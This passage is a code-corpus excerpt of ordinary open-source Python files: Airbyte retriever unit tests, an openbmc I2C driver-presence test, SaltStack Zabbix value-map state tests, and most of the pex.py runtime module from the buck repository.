base_mapping = {"key": "value"}
requester = MagicMock(use_cache=False)
requester.get_request_params.return_value = base_mapping
requester.get_request_body_data.return_value = base_mapping
requester.get_request_body_json.return_value = base_mapping
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
stream_slicer=stream_slicer,
parameters={},
config={},
)
request_option_type_to_method = {
RequestOptionType.request_parameter: retriever.request_params,
RequestOptionType.body_data: retriever.request_body_data,
RequestOptionType.body_json: retriever.request_body_json,
}
for _, method in request_option_type_to_method.items():
if expected_mapping:
actual_mapping = method(None, None, None)
assert expected_mapping == actual_mapping
else:
try:
method(None, None, None)
assert False
except ValueError:
pass
@pytest.mark.parametrize(
"test_name, paginator_mapping, expected_mapping",
[
("test_only_base_headers", {}, {"key": "value"}),
("test_header_from_pagination", {"offset": 1000}, {"key": "value", "offset": "1000"}),
("test_duplicate_header", {"key": 1000}, None),
],
)
def test_get_request_headers(test_name, paginator_mapping, expected_mapping):
# This test is separate from the other request options because request headers must be strings
paginator = MagicMock()
paginator.get_request_headers.return_value = paginator_mapping
requester = MagicMock(use_cache=False)
base_mapping = {"key": "value"}
requester.get_request_headers.return_value = base_mapping
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
parameters={},
config={},
)
request_option_type_to_method = {
RequestOptionType.header: retriever.request_headers,
}
for _, method in request_option_type_to_method.items():
if expected_mapping:
actual_mapping = method(None, None, None)
assert expected_mapping == actual_mapping
else:
            with pytest.raises(ValueError):
                method(None, None, None)
@pytest.mark.parametrize(
"test_name, requester_body_data, paginator_body_data, expected_body_data",
[
("test_only_requester_mapping", {"key": "value"}, {}, {"key": "value"}),
("test_only_requester_string", "key=value", {}, "key=value"),
("test_requester_mapping_and_paginator_no_duplicate", {"key": "value"}, {"offset": 1000}, {"key": "value", "offset": 1000}),
("test_requester_mapping_and_paginator_with_duplicate", {"key": "value"}, {"key": 1000}, None),
("test_requester_string_and_paginator", "key=value", {"offset": 1000}, None),
],
)
def test_request_body_data(test_name, requester_body_data, paginator_body_data, expected_body_data):
paginator = MagicMock()
paginator.get_request_body_data.return_value = paginator_body_data
requester = MagicMock(use_cache=False)
requester.get_request_body_data.return_value = requester_body_data
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
parameters={},
config={},
)
if expected_body_data:
actual_body_data = retriever.request_body_data(None, None, None)
assert expected_body_data == actual_body_data
else:
        with pytest.raises(ValueError):
            retriever.request_body_data(None, None, None)
@pytest.mark.parametrize(
"test_name, requester_path, paginator_path, expected_path",
[
("test_path_from_requester", "/v1/path", None, "/v1/path"),
("test_path_from_paginator", "/v1/path/", "/v2/paginator", "/v2/paginator"),
],
)
def test_path(test_name, requester_path, paginator_path, expected_path):
paginator = MagicMock()
paginator.path.return_value = paginator_path
requester = MagicMock(use_cache=False)
requester.get_path.return_value = requester_path
record_selector = MagicMock()
retriever = SimpleRetriever(
name="stream_name",
primary_key=primary_key,
requester=requester,
record_selector=record_selector,
paginator=paginator,
parameters={},
config={},
)
actual_path = retriever.path(stream_state=None, stream_slice=None, next_page_token=None)
assert expected_path == actual_path
@pytest.mark.parametrize(
"test_name, http_method, url, headers, params, body_json, body_data, expected_airbyte_message",
[
(
"test_basic_get_request",
HttpMethod.GET,
"https://airbyte.io",
{},
{},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO, message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {}, "body": null}'
),
),
),
(
"test_get_request_with_headers",
HttpMethod.GET,
"https://airbyte.io",
{"h1": "v1", "h2": "v2"},
{},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {"h1": "v1", "h2": "v2"}, "body": null}',
),
),
),
(
"test_get_request_with_request_params",
HttpMethod.GET,
"https://airbyte.io",
{},
{"p1": "v1", "p2": "v2"},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/?p1=v1&p2=v2", "http_method": "GET", "headers": {}, "body": null}',
),
),
),
(
"test_get_request_with_request_body_json",
HttpMethod.GET,
"https://airbyte.io",
{"Content-Type": "application/json"},
{},
{"b1": "v1", "b2": "v2"},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {"Content-Type": "application/json", "Content-Length": "24"}, "body": {"b1": "v1", "b2": "v2"}}',
),
),
),
(
"test_get_request_with_headers_params_and_body",
HttpMethod.GET,
"https://airbyte.io",
{"Content-Type": "application/json", "h1": "v1"},
{"p1": "v1", "p2": "v2"},
{"b1": "v1", "b2": "v2"},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/?p1=v1&p2=v2", "http_method": "GET", "headers": {"Content-Type": "application/json", "h1": "v1", "Content-Length": "24"}, "body": {"b1": "v1", "b2": "v2"}}',
),
),
),
(
"test_get_request_with_request_body_data",
HttpMethod.GET,
"https://airbyte.io",
{"Content-Type": "application/json"},
{},
{},
{"b1": "v1", "b2": "v2"},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "GET", "headers": {"Content-Type": "application/json", "Content-Length": "11"}, "body": {"b1": "v1", "b2": "v2"}}',
),
),
),
(
"test_basic_post_request",
HttpMethod.POST,
"https://airbyte.io",
{},
{},
{},
{},
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='request:{"url": "https://airbyte.io/", "http_method": "POST", "headers": {"Content-Length": "0"}, "body": null}',
),
),
),
],
)
def test_prepared_request_to_airbyte_message(test_name, http_method, url, headers, params, body_json, body_data, expected_airbyte_message):
request = requests.Request(method=http_method.name, url=url, headers=headers, params=params)
if body_json:
request.json = body_json
if body_data:
request.data = body_data
prepared_request = request.prepare()
actual_airbyte_message = _prepared_request_to_airbyte_message(prepared_request)
assert expected_airbyte_message == actual_airbyte_message
@pytest.mark.parametrize(
"test_name, response_body, response_headers, status_code, expected_airbyte_message",
[
(
"test_response_no_body_no_headers",
b"",
{},
200,
AirbyteMessage(
type=Type.LOG, log=AirbyteLogMessage(level=Level.INFO, message='response:{"body": "", "headers": {}, "status_code": 200}')
),
),
(
"test_response_no_body_with_headers",
b"",
{"h1": "v1", "h2": "v2"},
200,
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO, message='response:{"body": "", "headers": {"h1": "v1", "h2": "v2"}, "status_code": 200}'
),
),
),
(
"test_response_with_body_no_headers",
b'{"b1": "v1", "b2": "v2"}',
{},
200,
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='response:{"body": "{\\"b1\\": \\"v1\\", \\"b2\\": \\"v2\\"}", "headers": {}, "status_code": 200}',
),
),
),
(
"test_response_with_body_and_headers",
b'{"b1": "v1", "b2": "v2"}',
{"h1": "v1", "h2": "v2"},
200,
AirbyteMessage(
type=Type.LOG,
log=AirbyteLogMessage(
level=Level.INFO,
message='response:{"body": "{\\"b1\\": \\"v1\\", \\"b2\\": \\"v2\\"}", "headers": {"h1": "v1", "h2": "v2"}, "status_code": 200}',
),
),
),
],
)
def test_response_to_airbyte_message(test_name, response_body, response_headers, status_code, expected_airbyte_message):
response = requests.Response()
response.status_code = status_code
response.headers = response_headers
response._content = response_body
actual_airbyte_message = _response_to_airbyte_message(response)
assert expected_airbyte_message == actual_airbyte_message
def test_limit_stream_slices():
maximum_number_of_slices = 4
stream_slicer = MagicMock()
stream_slicer.stream_slices.return_value = _generate_slices(maximum_number_of_slices * 2)
retriever = SimpleRetrieverTestReadDecorator(
name="stream_name",
primary_key=primary_key,
requester=MagicMock(),
paginator=MagicMock(),
record_selector=MagicMock(),
stream_slicer=stream_slicer,
maximum_number_of_slices=maximum_number_of_slices,
parameters={},
config={},
)
truncated_slices = list(retriever.stream_slices(sync_mode=SyncMode.incremental, stream_state=None))
assert truncated_slices == _generate_slices(maximum_number_of_slices)
def _generate_slices(number_of_slices):
return [{"date": f"2022-01-0{day + 1}"} for day in range(number_of_slices)]
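# A minimal sketch of the slice-capping behavior asserted in
# test_limit_stream_slices above, using only the standard library;
# `truncate_slices` is a hypothetical helper, not the Airbyte CDK
# implementation.
import itertools

def truncate_slices(slices, maximum_number_of_slices):
    # islice yields at most `maximum_number_of_slices` items and stops
    # without consuming the rest of the iterable.
    return itertools.islice(slices, maximum_number_of_slices)

all_slices = [{"date": f"2022-01-0{day + 1}"} for day in range(8)]
assert list(truncate_slices(all_slices, 4)) == all_slices[:4]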
---
blob_id: 6de2084e7f96ff0b28dcfa5d8f8c7d24107b51d9 | directory_id: ac2f43c8e0d9649a7f063c59b3dffdfed9fd7ed7 | content_id: 4b789f4065e7c78d6392daaec4b9a0073e5b8ba3
repo_name: facebook/openbmc | path: /tests2/tests/cloudripper/test_i2c_driver_presence.py | filename: test_i2c_driver_presence.py | extension: py | length_bytes: 1600
detected_licenses: [] | license_type: no_license | gha_license_id: null
snapshot_id: bef10604ced226288600f55248b7f1be9945aea4 | revision_id: 32777c66a8410d767eae15baabf71c61a0bef13c | branch_name: refs/heads/helium
visit_date: 2023-08-17T03:13:54.729494 | revision_date: 2023-08-16T23:24:18 | committer_date: 2023-08-16T23:24:18
github_id: 31917712 | star_events_count: 684 | fork_events_count: 331 | gha_event_created_at: 2023-07-25T21:19:08 | gha_created_at: 2015-03-09T19:18:35
gha_language: C | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
#!/usr/bin/env python3
#
# Copyright 2020-present Facebook. All Rights Reserved.
#
# This program file is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program in a file named COPYING; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA
#
import unittest
from common.base_i2c_driver_presence_test import BaseI2cDriverPresenceTest
from utils.test_utils import qemu_check
class CloudripperI2cDriverPresenceTest(BaseI2cDriverPresenceTest, unittest.TestCase):
def set_i2c_driver_list(self):
self.i2c_driver_list = [
"ir35215",
"xdpe12284",
"powr1220",
"xdpe12284",
"pxe1610",
"adm1275",
"lm75",
"tmp421",
"net_asic",
"pca953x",
"domfpga",
"psu_driver",
"smb_pwrcpld",
"smb_syscpld",
"scmcpld",
"fcbcpld",
]
@unittest.skipIf(qemu_check(), "test env is QEMU, skipped")
def test_i2c_driver_presence(self):
super().test_i2c_driver_presence()
---
blob_id: 2137a93a916c5db5887d1ecfcd9839bee8dbf7a0 | directory_id: d110546d747d7e3865ce5742d5fca09f404623c0 | content_id: bc589d7bc92b9cb1bf56f6d8006ee1e6cc2179fc
repo_name: saltstack/salt | path: /tests/pytests/unit/states/zabbix/test_valuemap.py | filename: test_valuemap.py | extension: py | length_bytes: 7841
detected_licenses: ["Apache-2.0", "MIT", "BSD-2-Clause"] | license_type: permissive | gha_license_id: Apache-2.0
snapshot_id: 354fc86a7be1f69514b3dd3b2edb9e6f66844c1d | revision_id: 1ef90cbdc7203f97775edb7666db86a41eb9fc15 | branch_name: refs/heads/master
visit_date: 2023-07-19T20:56:20.210556 | revision_date: 2023-06-29T23:12:28 | committer_date: 2023-07-19T11:47:47
github_id: 1390248 | star_events_count: 11026 | fork_events_count: 6296 | gha_event_created_at: 2023-09-14T20:45:37 | gha_created_at: 2011-02-20T20:16:56
gha_language: Python | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
"""
:codeauthor: :email:`Jakub Sliva <jakub.sliva@ultimum.io>`
"""
import pytest
import salt.states.zabbix_valuemap as zabbix_valuemap
from tests.support.mock import MagicMock, patch
@pytest.fixture
def input_params():
return {
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
],
"name": "Server HP Health",
}
@pytest.fixture
def existing_obj():
return [
{
"valuemapid": "21",
"name": "Server HP Health",
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
],
}
]
@pytest.fixture
def existing_obj_diff():
return {
"valuemapid": "21",
"name": "Server HP Health",
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
{"newvalue": "some", "value": "2"},
],
}
@pytest.fixture
def diff_params():
return {
"valuemapid": "21",
"mappings": [
{"newvalue": "OK", "value": "0h"},
{"newvalue": "Failure", "value": "1"},
],
}
@pytest.fixture
def configure_loader_modules():
return {zabbix_valuemap: {}}
def test_present_create(input_params):
"""
Test to ensure that named value map is created
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
def side_effect_run_query(*args):
"""
Differentiate between __salt__ exec module function calls with different parameters.
"""
if args[0] == "valuemap.get":
return False
elif args[0] == "valuemap.create":
return True
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{
"zabbix.get_zabbix_id_mapper": MagicMock(
return_value={"valuemap": "valuemapid"}
),
"zabbix.substitute_params": MagicMock(
side_effect=[input_params, False]
),
"zabbix.run_query": MagicMock(side_effect=side_effect_run_query),
"zabbix.compare_params": MagicMock(return_value={}),
},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" created.'.format(name)
ret["changes"] = {
name: {
"old": 'Zabbix Value map "{}" did not exist.'.format(name),
"new": 'Zabbix Value map "{}" created according definition.'.format(
name
),
}
}
assert zabbix_valuemap.present(name, {}) == ret
def test_present_exists(input_params, existing_obj):
"""
Test to ensure that named value map is present and not changed
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{
"zabbix.get_zabbix_id_mapper": MagicMock(
return_value={"valuemap": "valuemapid"}
),
"zabbix.substitute_params": MagicMock(
side_effect=[input_params, existing_obj]
),
"zabbix.run_query": MagicMock(return_value=["length of result is 1"]),
"zabbix.compare_params": MagicMock(return_value={}),
},
):
ret["result"] = True
ret[
"comment"
] = 'Zabbix Value map "{}" already exists and corresponds to a definition.'.format(
name
)
assert zabbix_valuemap.present(name, {}) == ret
def test_present_update(input_params, existing_obj_diff, diff_params):
"""
Test to ensure that named value map is present but must be updated
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
def side_effect_run_query(*args):
"""
Differentiate between __salt__ exec module function calls with different parameters.
"""
if args[0] == "valuemap.get":
return ["length of result is 1 = valuemap exists"]
elif args[0] == "valuemap.update":
return diff_params
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{
"zabbix.get_zabbix_id_mapper": MagicMock(
return_value={"valuemap": "valuemapid"}
),
"zabbix.substitute_params": MagicMock(
side_effect=[input_params, existing_obj_diff]
),
"zabbix.run_query": MagicMock(side_effect=side_effect_run_query),
"zabbix.compare_params": MagicMock(return_value=diff_params),
},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" updated.'.format(name)
ret["changes"] = {
name: {
"old": (
'Zabbix Value map "{}" differed '
"in following parameters: {}".format(name, diff_params)
),
"new": 'Zabbix Value map "{}" fixed.'.format(name),
}
}
assert zabbix_valuemap.present(name, {}) == ret
def test_absent_test_mode():
"""
Test to ensure that named value map is absent in test mode
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
with patch.dict(zabbix_valuemap.__opts__, {"test": True}):
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.get_object_id_by_params": MagicMock(return_value=11)},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" would be deleted.'.format(name)
ret["changes"] = {
name: {
"old": 'Zabbix Value map "{}" exists.'.format(name),
"new": 'Zabbix Value map "{}" would be deleted.'.format(name),
}
}
assert zabbix_valuemap.absent(name) == ret
def test_absent():
"""
Test to ensure that named value map is absent
"""
name = "Server HP Health"
ret = {"name": name, "result": False, "comment": "", "changes": {}}
with patch.dict(zabbix_valuemap.__opts__, {"test": False}):
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.get_object_id_by_params": MagicMock(return_value=False)},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" does not exist.'.format(name)
assert zabbix_valuemap.absent(name) == ret
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.get_object_id_by_params": MagicMock(return_value=11)},
):
with patch.dict(
zabbix_valuemap.__salt__,
{"zabbix.run_query": MagicMock(return_value=True)},
):
ret["result"] = True
ret["comment"] = 'Zabbix Value map "{}" deleted.'.format(name)
ret["changes"] = {
name: {
"old": 'Zabbix Value map "{}" existed.'.format(name),
"new": 'Zabbix Value map "{}" deleted.'.format(name),
}
}
assert zabbix_valuemap.absent(name) == ret
---
blob_id: 782c14fe5df3867c8f31dd1cc15070011440eb87 | directory_id: e76a79816ff5203be2c4061e263a09d31072c940 | content_id: a928248558f25dbc552455e18c30deead440bd7e
repo_name: facebook/buck | path: /third-party/py/pex/pex/pex.py | filename: pex.py | extension: py | length_bytes: 17019
detected_licenses: ["Apache-2.0", "LicenseRef-scancode-unknown-license-reference"] | license_type: permissive | gha_license_id: Apache-2.0
snapshot_id: ef3a833334499b1b44c586e9bc5e2eec8d930e09 | revision_id: 9c7c421e49f4d92d67321f18c6d1cd90974c77c4 | branch_name: refs/heads/main
visit_date: 2023-08-25T19:30:28.803205 | revision_date: 2023-04-19T11:32:59 | committer_date: 2023-04-19T11:32:59
github_id: 9504214 | star_events_count: 8481 | fork_events_count: 1338 | gha_event_created_at: 2023-05-04T22:13:59 | gha_created_at: 2013-04-17T18:12:18
gha_language: Java | src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
---
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, print_function
import os
import subprocess
import sys
from contextlib import contextmanager
from distutils import sysconfig
from site import USER_SITE
import pkg_resources
from pkg_resources import EntryPoint, WorkingSet, find_distributions
from .common import die
from .compatibility import exec_function
from .environment import PEXEnvironment
from .finders import get_entry_point_from_console_script, get_script_from_distributions
from .interpreter import PythonInterpreter
from .orderedset import OrderedSet
from .pex_info import PexInfo
from .tracer import TRACER
from .variables import ENV
class DevNull(object):
def __init__(self):
pass
def write(self, *args, **kw):
pass
def flush(self):
pass
class PEX(object): # noqa: T000
"""PEX, n. A self-contained python environment."""
class Error(Exception): pass
class NotFound(Error): pass
@classmethod
def clean_environment(cls):
try:
del os.environ['MACOSX_DEPLOYMENT_TARGET']
except KeyError:
pass
# Cannot change dictionary size during __iter__
filter_keys = [key for key in os.environ if key.startswith('PEX_')]
for key in filter_keys:
del os.environ[key]
def __init__(self, pex=sys.argv[0], interpreter=None, env=ENV):
self._pex = pex
self._interpreter = interpreter or PythonInterpreter.get()
self._pex_info = PexInfo.from_pex(self._pex)
self._pex_info_overrides = PexInfo.from_env(env=env)
self._vars = env
self._envs = []
self._working_set = None
def _activate(self):
if not self._working_set:
working_set = WorkingSet([])
# set up the local .pex environment
pex_info = self._pex_info.copy()
pex_info.update(self._pex_info_overrides)
self._envs.append(PEXEnvironment(self._pex, pex_info))
# set up other environments as specified in PEX_PATH
for pex_path in filter(None, self._vars.PEX_PATH.split(os.pathsep)):
pex_info = PexInfo.from_pex(pex_path)
pex_info.update(self._pex_info_overrides)
self._envs.append(PEXEnvironment(pex_path, pex_info))
# activate all of them
for env in self._envs:
for dist in env.activate():
working_set.add(dist)
self._working_set = working_set
return self._working_set
@classmethod
def _extras_paths(cls):
standard_lib = sysconfig.get_python_lib(standard_lib=True)
try:
makefile = sysconfig.parse_makefile(sysconfig.get_makefile_filename())
except (AttributeError, IOError):
# This is not available by default in PyPy's distutils.sysconfig or it simply is
# no longer available on the system (IOError ENOENT)
makefile = {}
extras_paths = filter(None, makefile.get('EXTRASPATH', '').split(':'))
for path in extras_paths:
yield os.path.join(standard_lib, path)
@classmethod
def _site_libs(cls):
try:
from site import getsitepackages
site_libs = set(getsitepackages())
except ImportError:
site_libs = set()
site_libs.update([sysconfig.get_python_lib(plat_specific=False),
sysconfig.get_python_lib(plat_specific=True)])
# On windows getsitepackages() returns the python stdlib too.
if sys.prefix in site_libs:
site_libs.remove(sys.prefix)
real_site_libs = set(os.path.realpath(path) for path in site_libs)
return site_libs | real_site_libs
@classmethod
def _tainted_path(cls, path, site_libs):
paths = frozenset([path, os.path.realpath(path)])
return any(path.startswith(site_lib) for site_lib in site_libs for path in paths)
@classmethod
def minimum_sys_modules(cls, site_libs, modules=None):
"""Given a set of site-packages paths, return a "clean" sys.modules.
When importing site, modules within sys.modules have their __path__'s populated with
additional paths as defined by *-nspkg.pth in site-packages, or alternately by distribution
metadata such as *.dist-info/namespace_packages.txt. This can possibly cause namespace
packages to leak into imports despite being scrubbed from sys.path.
    NOTE: This method mutates modules' __path__ attributes in sys.modules, so this is currently an
irreversible operation.
"""
modules = modules or sys.modules
new_modules = {}
for module_name, module in modules.items():
# builtins can stay
if not hasattr(module, '__path__'):
new_modules[module_name] = module
continue
# Unexpected objects, e.g. namespace packages, should just be dropped:
if not isinstance(module.__path__, list):
TRACER.log('Dropping %s' % (module_name,), V=3)
continue
# Pop off site-impacting __path__ elements in-place.
for k in reversed(range(len(module.__path__))):
if cls._tainted_path(module.__path__[k], site_libs):
TRACER.log('Scrubbing %s.__path__: %s' % (module_name, module.__path__[k]), V=3)
module.__path__.pop(k)
# It still contains path elements not in site packages, so it can stay in sys.modules
if module.__path__:
new_modules[module_name] = module
return new_modules
@classmethod
def minimum_sys_path(cls, site_libs):
site_distributions = OrderedSet()
user_site_distributions = OrderedSet()
def all_distribution_paths(path):
locations = set(dist.location for dist in find_distributions(path))
return set([path]) | locations | set(os.path.realpath(path) for path in locations)
for path_element in sys.path:
if cls._tainted_path(path_element, site_libs):
TRACER.log('Tainted path element: %s' % path_element)
site_distributions.update(all_distribution_paths(path_element))
else:
TRACER.log('Not a tainted path element: %s' % path_element, V=2)
user_site_distributions.update(all_distribution_paths(USER_SITE))
for path in site_distributions:
TRACER.log('Scrubbing from site-packages: %s' % path)
for path in user_site_distributions:
TRACER.log('Scrubbing from user site: %s' % path)
scrub_paths = site_distributions | user_site_distributions
scrubbed_sys_path = list(OrderedSet(sys.path) - scrub_paths)
scrub_from_importer_cache = filter(
lambda key: any(key.startswith(path) for path in scrub_paths),
sys.path_importer_cache.keys())
scrubbed_importer_cache = dict((key, value) for (key, value) in sys.path_importer_cache.items()
if key not in scrub_from_importer_cache)
for importer_cache_entry in scrub_from_importer_cache:
TRACER.log('Scrubbing from path_importer_cache: %s' % importer_cache_entry, V=2)
return scrubbed_sys_path, scrubbed_importer_cache
@classmethod
def minimum_sys(cls):
"""Return the minimum sys necessary to run this interpreter, a la python -S.
:returns: (sys.path, sys.path_importer_cache, sys.modules) tuple of a
bare python installation.
"""
site_libs = set(cls._site_libs())
for site_lib in site_libs:
TRACER.log('Found site-library: %s' % site_lib)
for extras_path in cls._extras_paths():
TRACER.log('Found site extra: %s' % extras_path)
site_libs.add(extras_path)
site_libs = set(os.path.normpath(path) for path in site_libs)
sys_path, sys_path_importer_cache = cls.minimum_sys_path(site_libs)
sys_modules = cls.minimum_sys_modules(site_libs)
return sys_path, sys_path_importer_cache, sys_modules
@classmethod
@contextmanager
def patch_pkg_resources(cls, working_set):
"""Patch pkg_resources given a new working set."""
def patch(working_set):
pkg_resources.working_set = working_set
pkg_resources.require = working_set.require
pkg_resources.iter_entry_points = working_set.iter_entry_points
pkg_resources.run_script = pkg_resources.run_main = working_set.run_script
pkg_resources.add_activation_listener = working_set.subscribe
old_working_set = pkg_resources.working_set
patch(working_set)
try:
yield
finally:
patch(old_working_set)
# Thar be dragons -- when this contextmanager exits, the interpreter is
# potentially in a wonky state since the patches here (minimum_sys_modules
# for example) actually mutate global state. This should not be
# considered a reversible operation despite being a contextmanager.
@classmethod
@contextmanager
def patch_sys(cls):
"""Patch sys with all site scrubbed."""
def patch_dict(old_value, new_value):
old_value.clear()
old_value.update(new_value)
def patch_all(path, path_importer_cache, modules):
sys.path[:] = path
patch_dict(sys.path_importer_cache, path_importer_cache)
patch_dict(sys.modules, modules)
old_sys_path, old_sys_path_importer_cache, old_sys_modules = (
sys.path[:], sys.path_importer_cache.copy(), sys.modules.copy())
new_sys_path, new_sys_path_importer_cache, new_sys_modules = cls.minimum_sys()
patch_all(new_sys_path, new_sys_path_importer_cache, new_sys_modules)
yield
def _wrap_coverage(self, runner, *args):
if not self._vars.PEX_COVERAGE and self._vars.PEX_COVERAGE_FILENAME is None:
runner(*args)
return
try:
import coverage
except ImportError:
die('Could not bootstrap coverage module, aborting.')
pex_coverage_filename = self._vars.PEX_COVERAGE_FILENAME
if pex_coverage_filename is not None:
cov = coverage.coverage(data_file=pex_coverage_filename)
else:
cov = coverage.coverage(data_suffix=True)
TRACER.log('Starting coverage.')
cov.start()
try:
runner(*args)
finally:
TRACER.log('Stopping coverage')
cov.stop()
# TODO(wickman) Post-process coverage to elide $PEX_ROOT and make
# the report more useful/less noisy. #89
if pex_coverage_filename:
cov.save()
else:
cov.report(show_missing=False, ignore_errors=True, file=sys.stdout)
def _wrap_profiling(self, runner, *args):
if not self._vars.PEX_PROFILE and self._vars.PEX_PROFILE_FILENAME is None:
runner(*args)
return
pex_profile_filename = self._vars.PEX_PROFILE_FILENAME
pex_profile_sort = self._vars.PEX_PROFILE_SORT
try:
import cProfile as profile
except ImportError:
import profile
profiler = profile.Profile()
try:
return profiler.runcall(runner, *args)
finally:
if pex_profile_filename is not None:
profiler.dump_stats(pex_profile_filename)
else:
profiler.print_stats(sort=pex_profile_sort)
def execute(self):
"""Execute the PEX.
This function makes assumptions that it is the last function called by
the interpreter.
"""
teardown_verbosity = self._vars.PEX_TEARDOWN_VERBOSE
try:
with self.patch_sys():
working_set = self._activate()
TRACER.log('PYTHONPATH contains:')
for element in sys.path:
TRACER.log(' %c %s' % (' ' if os.path.exists(element) else '*', element))
TRACER.log(' * - paths that do not exist or will be imported via zipimport')
with self.patch_pkg_resources(working_set):
self._wrap_coverage(self._wrap_profiling, self._execute)
except Exception:
# Allow the current sys.excepthook to handle this app exception before we tear things down in
# finally, then reraise so that the exit status is reflected correctly.
sys.excepthook(*sys.exc_info())
raise
except SystemExit as se:
# Print a SystemExit error message, avoiding a traceback in python3.
# This must happen here, as sys.stderr is about to be torn down
if not isinstance(se.code, int) and se.code is not None:
print(se.code, file=sys.stderr)
raise
finally:
# squash all exceptions on interpreter teardown -- the primary type here are
# atexit handlers failing to run because of things such as:
# http://stackoverflow.com/questions/2572172/referencing-other-modules-in-atexit
if not teardown_verbosity:
sys.stderr.flush()
sys.stderr = DevNull()
sys.excepthook = lambda *a, **kw: None
def _execute(self):
force_interpreter = self._vars.PEX_INTERPRETER
self.clean_environment()
if force_interpreter:
TRACER.log('PEX_INTERPRETER specified, dropping into interpreter')
return self.execute_interpreter()
if self._pex_info_overrides.script and self._pex_info_overrides.entry_point:
die('Cannot specify both script and entry_point for a PEX!')
if self._pex_info.script and self._pex_info.entry_point:
die('Cannot specify both script and entry_point for a PEX!')
if self._pex_info_overrides.script:
return self.execute_script(self._pex_info_overrides.script)
elif self._pex_info_overrides.entry_point:
return self.execute_entry(self._pex_info_overrides.entry_point)
elif self._pex_info.script:
return self.execute_script(self._pex_info.script)
elif self._pex_info.entry_point:
return self.execute_entry(self._pex_info.entry_point)
else:
TRACER.log('No entry point specified, dropping into interpreter')
return self.execute_interpreter()
def execute_interpreter(self):
if sys.argv[1:]:
try:
with open(sys.argv[1]) as fp:
name, content = sys.argv[1], fp.read()
except IOError as e:
die("Could not open %s in the environment [%s]: %s" % (sys.argv[1], sys.argv[0], e))
sys.argv = sys.argv[1:]
self.execute_content(name, content)
else:
import code
code.interact()
def execute_script(self, script_name):
dists = list(self._activate())
entry_point = get_entry_point_from_console_script(script_name, dists)
if entry_point:
return self.execute_entry(entry_point)
dist, script_path, script_content = get_script_from_distributions(script_name, dists)
if not dist:
raise self.NotFound('Could not find script %s in pex!' % script_name)
TRACER.log('Found script %s in %s' % (script_name, dist))
return self.execute_content(script_path, script_content, argv0=script_name)
@classmethod
def execute_content(cls, name, content, argv0=None):
argv0 = argv0 or name
try:
ast = compile(content, name, 'exec', flags=0, dont_inherit=1)
except SyntaxError:
die('Unable to parse %s. PEX script support only supports Python scripts.' % name)
old_name, old_file = globals().get('__name__'), globals().get('__file__')
try:
old_argv0, sys.argv[0] = sys.argv[0], argv0
globals()['__name__'] = '__main__'
globals()['__file__'] = name
exec_function(ast, globals())
finally:
if old_name:
globals()['__name__'] = old_name
else:
globals().pop('__name__')
if old_file:
globals()['__file__'] = old_file
else:
globals().pop('__file__')
sys.argv[0] = old_argv0
@classmethod
def execute_entry(cls, entry_point):
runner = cls.execute_pkg_resources if ':' in entry_point else cls.execute_module
runner(entry_point)
@staticmethod
def execute_module(module_name):
import runpy
runpy.run_module(module_name, run_name='__main__')
@staticmethod
def execute_pkg_resources(spec):
